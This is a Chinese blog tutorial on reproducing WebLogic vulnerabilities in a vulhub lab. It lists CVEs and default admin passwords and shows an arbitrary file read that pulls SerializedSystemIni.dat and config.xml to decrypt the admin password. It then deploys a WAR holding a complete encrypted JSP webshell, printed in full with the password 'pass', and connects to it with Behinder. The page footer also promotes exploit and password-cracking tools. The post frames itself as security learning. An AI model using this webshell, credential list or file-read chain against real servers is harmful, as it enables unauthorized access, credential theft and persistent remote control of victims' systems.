Weblogic漏洞复现【含解密和shell连接工具】

最新推荐文章于 2024-03-28 09:57:15 发布
最新推荐文章于 2024-03-28 09:57:15 发布
阅读量1k 收藏 11
点赞数 17
分类专栏: 跟我学网安知识 文章标签: 反序列化漏洞 网络安全 漏洞复现 weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuqixiufen2/article/details/136199170
版权

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、漏洞成因

序列化和反序列化本身并不存在问题,但当输入的反序列化的数据可被用户控制时,那么攻击者即可通过构造恶意输入,让反序列化产生非预期的对象,在此过程中执行构造的任意代码。

2、历史漏洞

# Weblogic活跃的几个较新版本
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3

# 控制台路径泄露,弱口令
Weakpassword

#SSRF
CVE-2014-4210

#任意文件上传
CVE-2018-2894

#XMLDecoder反序列化:
CVE-2017-10271
CVE-2017-3506

#JAVA反序列化:
CVE-2015-4852
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2018-2628
CVE-2018-2893

3、weak_password漏洞复现

3.0、weblogic常用弱口令
账号 / 密码
system / password
weblogic / weblogic
weblogic / Oracle@123
admin / admin
joe / password
mary / password
system / security
wlcsystem / wlcsystem
wlpisystem / wlpisytem
3.1、启动靶场环境
# 先切到对应目录
cd /home/kali/vulhub-master/weblogic/weak_password

# 开启靶场
docker-compose up -d

# 查看靶场启动情况
docker-compose ps
3.2、访问靶场

访问:http://your-ip:7001

404特征

在这里插入图片描述

访问/console/login/LoginForm.jsp路径来到后台管理

在这里插入图片描述

3.3、任意读取文件

任意读取文件获取用户名密码,weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml。在本环境中为./security/SerializedSystemIni.dat./config/config.xml(基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain)。

在burp suite的HTTP history取一个GET请求记录右击send to Repeater,在请求URL修改为/hello/file.jsp?path=security/SerializedSystemIni.dat,点Send按钮发送请求,在响应页面会看到如下一段乱码

在这里插入图片描述

在响应端选择Hex标签,选择乱码的那部分右击选择Copy to file保存文件到自己指定的位置,文件名命名为SerializedSystemIni.dat。

在这里插入图片描述

同样的在burp suite的HTTP history取一个GET请求记录右击send to Repeater,在请求URL修改为/hello/file.jsp?path=config/config.xml,点Send按钮发送请求,在响应端找到节点node-manager-password-encrypted

在这里插入图片描述

3.4、工具解密

使用weblogic破解GUI工具,使用命令运行

java -jar weblogic_decrypt.jar

在这里插入图片描述

因此,得到用户名:weblogic,密码:Oracle@123。

3.5、后台上传shell

使用任意文件读取获取到的账号密码登录成功。上传路径:域结构-部署-安装-上传文件-将此部署安装为应用程序。然后访问项目名称即可。

在这里插入图片描述

在这里插入图片描述

在自己本地创建一个文件,命名为shell.jsp。一句话木马如下,密码为 pass:

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

一句话木马来源参考:https://blog.csdn.net/cscscys/article/details/107856619

将其压缩为 shell.zip,然后重命名为 shell.war,选中war包并点击下一步上传。

在这里插入图片描述

war是一个可以直接运行的web模块,通常用于网站,打成包部署到容器中。
war包放置到web目录下之后,可以自动解压,就相当于发布了。

上传成功,一直点下一步,到最后一步点保存。

在这里插入图片描述

3.6、冰蝎连接

打开冰蝎使用命令运行

java -jar Behinder.jar

访问 http://your-ip:7001/shell/shell.jsp,密码在上面定义的是pass,使用冰蝎连接。

在这里插入图片描述
在这里插入图片描述

4、资料获取

如果需要本文weblogic漏洞利用工具包,请关注公众号:大象只为你,后台回复:weblogic漏洞。

大象只为你
关注
  • 17
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
weblogic密码加解密 - rznice的专栏 - CSDN博客1
08-03
1. 密钥K1进DES加密 2. K2对步骤1的结果进DES解密 3. 步骤2的结果使密钥K1进DES加密
weblogic解密工具
sdjzuch的专栏
08-01 914
1、扔源码 1.1、WeblogicENDEcrypt.java import weblogic.security.internal.SerializedSystemIni; import weblogic.security.internal.encryption.ClearOrEncryptedService; import weblogic.security.internal.encryp...
探索WebLogic Password Decryptor UI:一款强大的密码解密工具
最新发布
gitblog_00062的博客
03-28 266
探索WebLogic Password Decryptor UI:一款强大的密码解密工具 项目地址:https://gitcode.com/Ch1ngg/WebLogicPasswordDecryptorUi 在网络安全和服务器管理领域,能够安全、有效地管理和恢复密码是至关重要的。WebLogic Password Decryptor UI 是一个专为Oracle WebLogic Server设...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
weblogic密码超级无敌强的解密工具v1.0
04-17
weblogic密码超级无敌强的解密工具v1.0,超级无敌强的解密工具,只需要S***.dat和加密的密文即可完成一键解密,强的一批。 PS:jar文件,需要安装jdk环境,打开即可使用,童叟无欺
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 7324
一直没有系统的总结过 weblogic漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
Weblogic密码破解工具V1.0
12-27
weblogic密码破解工具,仅提供研究,不作商业用途或破坏!
WebLogic Server 账号密码密文解密小方法
做自己喜欢的事,并将其发挥到极致!
03-20 1473
WebLogic Server 账号密码密文解密小方法
Weblogic AES加密内容破解(数据源文件内的数据库密码和设置启动免输入的weblogic用户和密码)
ShA_QimA的博客
10-21 3278
一,找到weblogic的安装目录下的wlst.sh脚本 二,wlst.sh脚本 三,设置3个参数 逐条输入 domain = "/weblogic/bea/user_projects/domains/ha_domain/" service = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domain) encryption = weblogic.security.internal.encryptio
weblogic反序列化全版本漏洞利用工具
06-27
weblogic反序列化全版本漏洞利用工具,可执行命令
weblogic10.X AES加解密
06-27
weblogic10.X AES加解密 jdbc加解密 boot.properties加解密 WLEncrypt:=========================== encrypt result:{AES}f5GuX7x1nWKVrz2yTneeiKBRMDkE1Z08Ud/rcZYozwE= decrypt result:weblogic WLEncrypt:===========================
java反序列化漏洞利用工具WebLogicExploit_weblogic图形化漏洞利用工具
09-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
WebLogic密码破解
04-23
在忘记原来的Weblogic密码的情况下,新接手中间件管理工程师,又不想重部应用,可用此法找回原来的用户密码.
weblogic漏洞检测集合工具
11-17
weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞
Weblogic漏洞 - Weblogic 弱口令漏洞
HAKUNAMATATATTA的博客
12-02 1788
WebLogic Server 是美国甲骨文( Oracle )公司开发的一款适用于云环境和传统环境的应用服务中间件,确切的说是一个基于 JavaEE 架构的中间件,它提供了一个现代轻型开发平台,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。将Java 的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
vulhub靶场-weblogic漏洞复现
m0_62008601的博客
07-18 1682
vulhub-weblogic漏洞复现集 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-10271
weblogic漏洞复现vulhub
08-21
复现weblogic漏洞,可以使用vulhub靶场中的weblogic服务。vulhub中提供了一些weblogic版本,包括weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2和weblogic 12.2.1.3。你可以选择其中一个版本来启动weblogic服务。 你可以通过访问https://github.com/zhzyker/exphub/tree/master/weblogic获取更多关于weblogic漏洞的信息。 在vulhub的靶场上,你可以学习和复现一些weblogic漏洞。虽然还有很多其他漏洞没有被复现,但通过复现一些典型漏洞,你可以熟悉这些漏洞的原理。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【vulhub】Weblogic(CVE-2018-2894)漏洞复现](https://blog.csdn.net/qq_45300786/article/details/115579631)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Weblogic系列漏洞复现——vulhub](https://blog.csdn.net/qq_45612828/article/details/126235627)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值